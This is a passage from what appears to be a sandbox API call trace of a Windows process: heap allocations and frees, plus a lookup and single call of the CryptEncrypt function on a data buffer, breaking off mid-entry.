RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0226.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0226.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0226.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0226.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0226.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0226.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0226.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0226.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0226.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24f6) returned 0x2f16d18 [0226.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16d18 | out: hHeap=0x970000) returned 1 [0226.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0226.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0226.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x3bf7cd8 [0226.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0226.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0226.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0226.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0226.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0226.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0226.427] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0226.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0226.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0226.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0226.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0226.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0226.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0226.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0226.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0226.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0226.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0226.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0226.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0226.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0226.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0226.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0226.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0226.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0226.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0226.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0226.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0226.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0226.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0226.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0226.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0226.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0226.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0226.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0226.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0226.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0226.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0226.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0226.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0226.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0226.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0226.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0226.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0226.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0226.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0226.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0226.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0226.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0226.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0226.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0226.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0226.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0226.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0226.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0226.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0226.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0226.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0226.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0226.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0226.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0226.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0226.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0226.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e513d0 [0226.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e513d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0226.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0226.431] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0226.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0226.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f5f8 [0226.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0226.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0226.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0226.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0226.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0226.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0226.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0226.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0226.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0226.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0226.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0226.431] CryptEncrypt (in: hKey=0xa875d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f14818*, pdwDataLen=0x8cef60*=0x24f6, dwBufLen=0x24f8 | out: pbData=0x2f14818*, pdwDataLen=0x8cef60*=0x24f8) returned 1 [0226.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf7d60 [0226.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0226.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0226.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0226.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0226.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0226.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0226.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0226.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0226.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0226.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0226.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0226.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0226.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0226.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0226.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0226.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0226.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0226.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0226.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0226.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0226.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0226.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0226.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0226.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0226.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0226.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0226.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0226.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0226.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0226.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0226.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0226.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0226.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0226.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0226.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0226.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0226.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0226.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0226.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0226.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0226.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0226.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0226.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0226.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0226.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0226.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0226.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0226.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0226.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0226.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0226.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0226.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.435] HeapFree (in: hHeap=0x970000, 